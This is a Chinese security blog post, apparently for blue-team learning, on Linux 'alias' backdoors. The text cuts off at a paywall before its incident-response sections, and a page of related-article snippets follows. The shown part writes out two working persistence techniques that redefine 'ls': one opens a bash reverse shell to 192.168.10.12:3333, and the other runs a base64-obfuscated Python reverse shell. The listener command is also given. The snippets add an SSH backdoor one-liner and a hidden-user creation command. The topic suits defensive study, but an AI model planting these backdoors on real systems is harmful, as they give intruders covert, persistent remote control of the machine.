alias 后门从入门到应急响应

于 2024-09-17 14:32:57 发布
阅读量1.5k 收藏 34
点赞数 28
CC 4.0 BY-SA版权
分类专栏: 网络安全学习 # 蓝队 文章标签: 蓝队 应急响应 安全运维 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72543266/article/details/142314311

目录

1. alias 后门介绍

2. alias 后门注入方式

2.1 方式一(以函数的方式执行)

2.2 方式二(执行python脚本)

3.应急响应 

3.1  查看所有连接

3.2 通过PID查看异常连接的进程,以及该进程正在执行的命令行命令

3.3 查看别名

3.4 其他情况  

3.5 那么检查这些启动程序和配置文件是否被篡改

1. alias 后门介绍

        在Linux系统中,alias命令通常用于为常用的命令设置快捷方式或别名,以提高工作效率。然而,这个特性也可能被滥用来创建后门,允许攻击者在不知情的情况下执行恶意命令。

2. alias 后门注入方式

2.1 方式一(以函数的方式执行)

alias命令的功能:为命令设置别名
alias 查看命令的别名
定义:alias ls="ls -al"
删除别名的:unalias ls
每次输入ls命令的时候都能实现ls -al

# 方式一设置 输入ls时会卡主
alias ls="ls -al"
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.10.12/3333 0>&1; };alerts'


# 反弹shell,只需要被植入的后门的主机输入ls命令就会反弹一次shell,但是会卡主容易被发现

 设置完毕后,每输入一次ls命令就会反弹一次shell ,但是会卡主,容易引起怀疑

 在kali监听主机端,输入nc -lvvp 3333 监听端口

2.2 方式二(执行python脚本)

alias命令的功能:为命令设置别名
alias 查看命令的别名
定义:alias ls="ls -al"
删除别名的:unalias ls
每次输入ls命令的时候都能实现ls -al

# 设置一后再设置二时先删除1
unalias ls
alias ls="ls -al"

# 方式二设置 需要有Python3环境
alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xNSIsIDMzMzMpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3
最低0.47元/天 解锁文章

新学期VIP享超值加赠
阿一网络安全学院干货科普篇之应急响应【上】
qq_69775412的博客
06-17 1336
安全人员在遇到突发事件后所采取的措施和行动。发生在计算机系统或网络上威胁安全的事件。如黑客入侵、信息窃取等。信息安全生命周期的必要组成部分,这个生命周期包括:对策、检测和响应。运维人员无法迅速处理安全事件时,需要第三方厂商提供一种能发现并解决问题的有效服务手段。控制影响范围确保业务正常运转、还原攻击场景、找到问题根源、最后追溯攻击源。以最快速度恢复系统的保密性、完整性和可用性,阻止和减小安全事件带来的影响。积极预防、及时发现、快速反应、确保恢复。
工具分享 | Ashro_linux - Linux通用应急响应脚本工具,应急响应必备,护网蓝队必备,运维必备。
IT软件汇
09-17 773
工具分享 | Ashro_linux - Linux通用应急响应脚本工具,应急响应必备,护网蓝队必备,运维必备。
LINUX留后门--教程(七)—— alias 后门
W小哥
08-02 3343
一、SSH后门介绍 当获取到一个服务器的shell之后,肯定需要维持好我们的权限,这里我们需要留个后门方便我们进出。 前提: 我们通过各种方式提权到root,拿到root之后才是我们留后门的开始。 做了个openssh的后门,也就是root双密码,管理员一个密码、我们的后门一个密码,不影响管理员的那个密码。 实验环境: Centos 8 二、SSH后门制作教程 ...
Linux服务器应急响应(下)
山兔的博客
09-08 471
Linux alias命令用于设置指令的别名。用户可利用alias,自定指令的别名。若仅输入alias,则可列出目前所有的别名设置。alias的效力仅及于该次登入的操作。若要每次登入是即自动设好别名,可在.profile或.cshrc中设定指令的别名。
linux后门
一个码农的笔记
04-25 2465
如果你登陆到一台linux设备,并且拿到了了root权限,但是你不希望他丢,那么你要建立后门 首先第一种方法: ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 登陆的方式是: ssh root@ip -p 31337 密码随意 这种方法不太稳定,经常会因为各种原因失效。 第二种方法: [root@localhost
权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务
今天是几号的博客
04-16 1838
alias命令的功能:为命令设置别名定义:alias ls = ‘ls -al’删除:unalias ls每次输入ls命令的时候都能实现ls -alalerts'这样目标执行ls命令后可以上线,不过ls命令会被阻塞在那里,很容易引起怀疑,当结束终端窗口时,反弹shell的会话也会随着被终结,而且更改后的alias命令只在当前窗口才有效(重启也会失效)2、升级:))";alerts’进行base64编码是因为python程序有空行和空格,将一段命令转换成单行命令。
linux权限维持
E1even的博客
11-04 1092
接下来将开启linux权限维持的学习: 放一张Llinux权限维持镇楼图(图源ShAun’s Blog) 修改文件创建时间 如果蓝队根据文件修改时间来判断文件是否为后门,如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题。 使用touch命令修改时间和属性 touch -r index.php shell.php 这里就复刻了index.php的属性,创建了一个同属性的shell.php ...
Alias教程入门[汇编].pdf
10-11
Alias教程入门[汇编] Alias是一款功能强大且广泛应用于工业设计和动画领域的三维设计软件。下面是对Alias教程入门[汇编]的知识点总结: 一、Alias概述 Alias是由加拿大Alias/Wavefront公司所设计、开发出来的软件...
alias入门教程
09-11
写个那些想学习alias的新人写个那些想学习alias的新人
linux 系统命令被后门修改_红队实战攻防技术分享:Linux后门总结SSH利用篇
weixin_39917090的博客
11-21 774
导读:常见红队评估中,也能遇到很多Linux服务器,如何使Linux在安全人员/运维人员的检查过程中能够稳定的持续的用做跳板,本系列文章将对常见的Linux后门技术作以总结归纳,将相关技术展现给大家。本篇文章是Linux后门总结文章第一篇,简单介绍了一些常见的shell反弹用法,还有针对不同系统/架构的反弹用法,后门要达到的目的一般都是用作权限维持,这里只介绍几种后面文章中会利用到的sh...
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
应急响应之Linux权限维持--后门
明哥哥知识分享
01-14 915
本文将对Linux下常见的权限维持技术进行解析,知己知彼百战不殆。 1、一句话添加用户和密码 添加普通用户: # 创建一个用户名guest,密码123456的普通用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` guest # useradd -p 方法 ` ` 是用来存放可执行的系统命令,"$()"也可以存放命令执行语句 useradd -p "$(openssl passwd -1 123456)" guest # chpasswd方法
后渗透之各种维持权限后门原理即利用
p_utao的博客
09-13 4090
前言 在拿到最高权限后,我们就应该建立后门(backdoor)了,以维持对目标主机的控制权,这样一来,即使我们所利用的漏洞被补丁程序修复了,还可以通过后门继续控制目标系统。 后门简单来说就是一个留在目标主机上的系统,它可以使攻击者随时连接到目标主机,大多数情况下,后门是一个运行在目标主机上的隐藏进程,它允许一个普通的、未授权的用户控制计算机。 操作系统后门 后门泛指绕过目标系统安全控制体系的正规用户认证过程,从而维持我们对目标系统的控制权,以及隐匿控制行为的方法。Meterpreter提供 了Persis
Linux的常用命令详解(一)
野生的程序员
01-22 278
一、命令的基本格式1. 命令的符号[root@localhost ~]#[]:这是提示符的分隔符号,没有特殊含义。root:显示的是当前的登录用户。@:分隔符号,没有特殊含义。loca...
乐播投屏v5.5.76
最新发布
09-06
乐播投屏是一款简单好用、功能强大的专业投屏软件,支持手机投屏电视、手机投电脑、电脑投电视等多种投屏方式。 多端兼容与跨网投屏:支持手机、平板、电脑等多种设备之间的自由组合投屏,且无需连接 WiFi,通过跨屏技术打破网络限制,扫一扫即可投屏。 广泛的应用支持:支持 10000+APP 投屏,包括综合视频、网盘与浏览器、美韩剧、斗鱼、虎牙等直播平台,还能将央视、湖南卫视等各大卫视的直播内容一键投屏。 高清流畅投屏体验:腾讯独家智能音画调校技术,支持 4K 高清画质、240Hz 超高帧率,低延迟不卡顿,能为用户提供更高清、流畅的视觉享受。 会议办公功能强大:拥有全球唯一的 “超级投屏空间”,扫码即投,无需安装。支持多人共享投屏、远程协作批注,PPT、Excel、视频等文件都能流畅展示,还具备企业级安全加密,保障会议资料不泄露。 多人互动功能:支持多人投屏,邀请好友加入投屏互动,远程也可加入。同时具备一屏多显、语音互动功能,支持多人连麦,实时语音交流。 文件支持全面:支持 PPT、PDF、Word、Excel 等办公文件,以及视频、图片等多种类型文件的投屏,还支持网盘直投,无需下载和转格式。 特色功能丰富:投屏时可同步录制投屏画面,部分版本还支持通过触控屏或电视端外接鼠标反控电脑,以及在投屏过程中用画笔实时标注等功能。
spring-ai-alibaba-starter-tool-calling-openalex-1.0.0.3.jar中文-英文对照文档.zip
09-06
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
【微信小程序源码】阅享小程序(阅读评价类).zip
09-06
资源说明: 1:本资料仅用作交流学习参考,请切勿用于商业用途。 2:一套精品实用微信小程序源码资源,无论是入门练手还是项目复用都超实用,省去重复开发时间,让开发少走弯路! 更多精品资源请访问 https://blog.csdn.net/ashyyyy/article/details/146464041
google-cloud-monitoring-3.68.0.jar中文-英文对照文档.zip
09-06
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

​0xSecDebug

你的支持,使我更好的创作

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值